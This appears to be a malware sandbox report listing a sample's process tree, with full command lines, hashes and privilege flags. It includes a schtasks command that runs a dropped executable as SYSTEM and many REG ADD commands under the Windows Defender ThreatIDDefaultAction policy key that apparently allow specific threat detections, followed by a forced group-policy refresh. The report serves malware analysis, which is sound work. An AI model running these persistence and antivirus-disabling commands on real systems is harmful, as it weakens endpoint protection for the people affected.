            Commandline:schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F
            Imagebase:0xbb0000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:22
            Start time:17:13:43
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:23
            Start time:17:13:46
            Start date:03/10/2022
            Path:C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S
            Imagebase:0xc80000
            File size:7079936 bytes
            MD5 hash:6F52A47480DAE7C97A64DD5AEBB8E426
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 73%, ReversingLabs
            • Detection: 0%, Metadefender, Browse

            General

            Target ID:24
            Start time:17:13:49
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
            Imagebase:0xed0000
            File size:430592 bytes
            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET

            General

            Target ID:25
            Start time:17:13:49
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:26
            Start time:17:13:58
            Start date:03/10/2022
            Path:C:\Windows\System32\gpupdate.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\gpupdate.exe" /force
            Imagebase:0x7ff655bd0000
            File size:29184 bytes
            MD5 hash:47C68FE26B0188CDD80F744F7405FF26
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Target ID:27
            Start time:17:13:59
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Target ID:30
            Start time:17:14:05
            Start date:03/10/2022
            Path:C:\Windows\System32\gpscript.exe
            Wow64 process (32bit):false
            Commandline:gpscript.exe /RefreshSystemParam
            Imagebase:0x7ff6974f0000
            File size:44544 bytes
            MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:33
            Start time:17:14:26
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:34
            Start time:17:14:27
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:35
            Start time:17:14:28
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:36
            Start time:17:14:28
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:37
            Start time:17:14:28
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:38
            Start time:17:14:29
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:39
            Start time:17:14:29
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:40
            Start time:17:14:30
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:41
            Start time:17:14:30
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:42
            Start time:17:14:31
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:43
            Start time:17:14:31
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:44
            Start time:17:14:32
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:45
            Start time:17:14:32
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:46
            Start time:17:14:33
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:47
            Start time:17:14:33
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:48
            Start time:17:14:34
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:49
            Start time:17:14:34
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:50
            Start time:17:14:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:51
            Start time:17:14:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:53
            Start time:17:14:36
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:54
            Start time:17:14:37
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            Disassembly

            No disassembly